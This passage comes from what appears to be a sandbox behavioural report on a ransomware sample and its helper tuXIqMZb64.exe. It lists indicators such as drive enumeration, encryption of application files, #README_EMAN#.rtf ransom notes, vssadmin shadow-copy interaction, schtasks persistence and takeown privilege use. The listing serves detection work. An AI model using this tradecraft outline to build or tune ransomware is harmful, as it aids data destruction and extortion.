File opened for modification C:\Users\Public\Recorded TV\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZZZ3YRT4\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VL9MRVWS\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Music\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Music\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files (x86)\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Documents\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive. Both the main sample and the tuXIqMZb64.exe helper probe every drive letter from A: to Z:, so any mapped network share or removable volume present on a victim host would be in scope for encryption; activity on such volumes is only observable here if they existed in the sandbox.
description ioc Process File opened (read-only) \??\S: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\R: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\J: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\F: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\Y: tuXIqMZb64.exe File opened (read-only) \??\Z: tuXIqMZb64.exe File opened (read-only) \??\Z: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\O: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\H: tuXIqMZb64.exe File opened (read-only) \??\O: tuXIqMZb64.exe File opened (read-only) \??\X: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\E: tuXIqMZb64.exe File opened (read-only) \??\F: tuXIqMZb64.exe File opened (read-only) \??\I: tuXIqMZb64.exe File opened (read-only) \??\P: tuXIqMZb64.exe File opened (read-only) \??\T: tuXIqMZb64.exe File opened (read-only) \??\U: tuXIqMZb64.exe File opened (read-only) \??\W: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\U: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\N: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\N: tuXIqMZb64.exe File opened (read-only) \??\Q: tuXIqMZb64.exe File opened (read-only) \??\W: tuXIqMZb64.exe File opened (read-only) \??\R: tuXIqMZb64.exe File opened (read-only) \??\X: tuXIqMZb64.exe File opened (read-only) \??\B: tuXIqMZb64.exe File opened (read-only) \??\T: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\Q: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\P: 
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\M: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\L: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\G: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\A: tuXIqMZb64.exe File opened (read-only) \??\J: tuXIqMZb64.exe File opened (read-only) \??\K: tuXIqMZb64.exe File opened (read-only) \??\S: tuXIqMZb64.exe File opened (read-only) \??\Y: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\V: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\I: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\H: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\G: tuXIqMZb64.exe File opened (read-only) \??\L: tuXIqMZb64.exe File opened (read-only) \??\K: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\E: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\M: tuXIqMZb64.exe File opened (read-only) \??\V: tuXIqMZb64.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\nH19RRW3.bmp" reg.exe — the wallpaper is set through a reg.exe child process rather than a direct API call, so a reg.exe command line writing Control Panel\Desktop\Wallpaper to a .bmp under AppData\Roaming is a usable detection, and the dropped nH19RRW3.bmp is a host artefact; the SID is the sandbox user's, not a meaningful indicator. -
Drops file in Program Files directory 64 IoCs — the rows below mix creation of the ransom note with "File opened for modification" of existing application files in the Java, VLC, Chrome, Firefox, Adobe Reader and Windows Mail install trees, including executables such as javacpl.exe, pack200.exe and plugin-container.exe. Encrypting installed application binaries, not just user data, means recovery on an affected host requires application reinstallation as well as data restore.
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_100_percent.pak 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program 
Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thule 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program 
Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-6 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\en-US\Mahjong.exe.mui 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\ConfirmResume.vssx 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program 
Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Windows Journal\Templates\Shorthand.jtp 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Chess\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program 
Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\ConvertAdd.css 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\docs.crx 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage or optical drive(s); this is likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
schtasks.exe is often used by malware to establish persistence or to perform post-infection execution.
pid Process 628 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2024 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1572 tuXIqMZb64.exe 1572 tuXIqMZb64.exe 1572 tuXIqMZb64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1572 tuXIqMZb64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1572 tuXIqMZb64.exe Token: SeLoadDriverPrivilege 1572 tuXIqMZb64.exe Token: SeTakeOwnershipPrivilege 528 takeown.exe Token: SeTakeOwnershipPrivilege 956 takeown.exe Token: SeTakeOwnershipPrivilege 1620 takeown.exe Token: SeTakeOwnershipPrivilege 1588 takeown.exe Token: SeTakeOwnershipPrivilege 1984 takeown.exe Token: SeTakeOwnershipPrivilege 1816 takeown.exe Token: SeTakeOwnershipPrivilege 848 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 1444 takeown.exe Token: SeTakeOwnershipPrivilege 1620 takeown.exe Token: SeTakeOwnershipPrivilege 1216 takeown.exe Token: SeTakeOwnershipPrivilege 1240 takeown.exe Token: SeTakeOwnershipPrivilege 1396 takeown.exe Token: SeTakeOwnershipPrivilege 1000 takeown.exe Token: SeTakeOwnershipPrivilege 1952 takeown.exe Token: SeTakeOwnershipPrivilege 1784 takeown.exe Token: SeTakeOwnershipPrivilege 408 takeown.exe Token: SeTakeOwnershipPrivilege 1776 takeown.exe Token: SeTakeOwnershipPrivilege 1408 takeown.exe Token: SeTakeOwnershipPrivilege 1736 takeown.exe Token: SeTakeOwnershipPrivilege 620 takeown.exe Token: SeTakeOwnershipPrivilege 1504 takeown.exe Token: SeTakeOwnershipPrivilege 1908 takeown.exe Token: SeTakeOwnershipPrivilege 1972 takeown.exe Token: SeTakeOwnershipPrivilege 1952 takeown.exe Token: SeTakeOwnershipPrivilege 544 takeown.exe Token: SeTakeOwnershipPrivilege 1724 takeown.exe Token: SeTakeOwnershipPrivilege 680 takeown.exe Token: SeTakeOwnershipPrivilege 1984 takeown.exe Token: SeTakeOwnershipPrivilege 1124 takeown.exe Token: SeTakeOwnershipPrivilege 1736 takeown.exe Token: SeTakeOwnershipPrivilege 1716 takeown.exe Token: SeTakeOwnershipPrivilege 1424 takeown.exe Token: SeTakeOwnershipPrivilege 1512 takeown.exe Token: SeTakeOwnershipPrivilege 2004 takeown.exe Token: SeTakeOwnershipPrivilege 1424 takeown.exe Token: SeBackupPrivilege 1648 vssvc.exe Token: SeRestorePrivilege 1648 vssvc.exe Token: SeAuditPrivilege 1648 vssvc.exe 
Token: SeTakeOwnershipPrivilege 904 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 1168 takeown.exe Token: SeTakeOwnershipPrivilege 1740 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 996 takeown.exe Token: SeTakeOwnershipPrivilege 1768 takeown.exe Token: SeTakeOwnershipPrivilege 1184 takeown.exe Token: SeTakeOwnershipPrivilege 1180 takeown.exe Token: SeTakeOwnershipPrivilege 1844 takeown.exe Token: SeTakeOwnershipPrivilege 692 takeown.exe Token: SeTakeOwnershipPrivilege 1624 takeown.exe Token: SeTakeOwnershipPrivilege 2008 takeown.exe Token: SeTakeOwnershipPrivilege 1700 takeown.exe Token: SeTakeOwnershipPrivilege 996 takeown.exe Token: SeTakeOwnershipPrivilege 1364 takeown.exe Token: SeTakeOwnershipPrivilege 1108 takeown.exe Token: SeTakeOwnershipPrivilege 320 takeown.exe Token: SeTakeOwnershipPrivilege 1900 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 796 takeown.exe Token: SeTakeOwnershipPrivilege 2008 takeown.exe Token: SeTakeOwnershipPrivilege 1100 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1492 wrote to memory of 664 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 28 PID 1492 wrote to memory of 664 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 28 PID 1492 wrote to memory of 664 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 28 PID 1492 wrote to memory of 664 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 28 PID 1492 wrote to memory of 1240 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 30 PID 1492 wrote to memory of 1240 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 30 PID 1492 wrote to memory of 1240 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 30 PID 1492 wrote to memory of 1240 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 30 PID 1492 wrote to memory of 936 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 32 PID 1492 wrote to memory of 936 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 32 PID 1492 wrote to memory of 936 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 32 PID 1492 wrote to memory of 936 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 32 PID 1492 wrote to memory of 1972 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 33 PID 1492 wrote to memory of 1972 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 33 PID 1492 wrote to memory of 1972 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 33 PID 1492 wrote to memory of 1972 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 33 PID 936 wrote to memory of 1724 936 cmd.exe 37 PID 936 wrote to memory of 1724 936 cmd.exe 37 PID 936 wrote to memory of 1724 936 cmd.exe 37 PID 936 wrote to memory of 1724 936 cmd.exe 37 PID 1972 wrote to 
memory of 904 1972 cmd.exe 36 PID 1972 wrote to memory of 904 1972 cmd.exe 36 PID 1972 wrote to memory of 904 1972 cmd.exe 36 PID 1972 wrote to memory of 904 1972 cmd.exe 36 PID 936 wrote to memory of 1108 936 cmd.exe 38 PID 936 wrote to memory of 1108 936 cmd.exe 38 PID 936 wrote to memory of 1108 936 cmd.exe 38 PID 936 wrote to memory of 1108 936 cmd.exe 38 PID 936 wrote to memory of 1592 936 cmd.exe 39 PID 936 wrote to memory of 1592 936 cmd.exe 39 PID 936 wrote to memory of 1592 936 cmd.exe 39 PID 936 wrote to memory of 1592 936 cmd.exe 39 PID 1492 wrote to memory of 956 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 41 PID 1492 wrote to memory of 956 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 41 PID 1492 wrote to memory of 956 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 41 PID 1492 wrote to memory of 956 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 41 PID 956 wrote to memory of 1396 956 cmd.exe 43 PID 956 wrote to memory of 1396 956 cmd.exe 43 PID 956 wrote to memory of 1396 956 cmd.exe 43 PID 956 wrote to memory of 1396 956 cmd.exe 43 PID 956 wrote to memory of 1204 956 cmd.exe 44 PID 956 wrote to memory of 1204 956 cmd.exe 44 PID 956 wrote to memory of 1204 956 cmd.exe 44 PID 956 wrote to memory of 1204 956 cmd.exe 44 PID 956 wrote to memory of 1124 956 cmd.exe 45 PID 956 wrote to memory of 1124 956 cmd.exe 45 PID 956 wrote to memory of 1124 956 cmd.exe 45 PID 956 wrote to memory of 1124 956 cmd.exe 45 PID 1124 wrote to memory of 1084 1124 cmd.exe 46 PID 1124 wrote to memory of 1084 1124 cmd.exe 46 PID 1124 wrote to memory of 1084 1124 cmd.exe 46 PID 1124 wrote to memory of 1084 1124 cmd.exe 46 PID 1492 wrote to memory of 824 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 47 PID 1492 wrote to memory of 824 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 47 PID 1492 wrote to memory of 824 
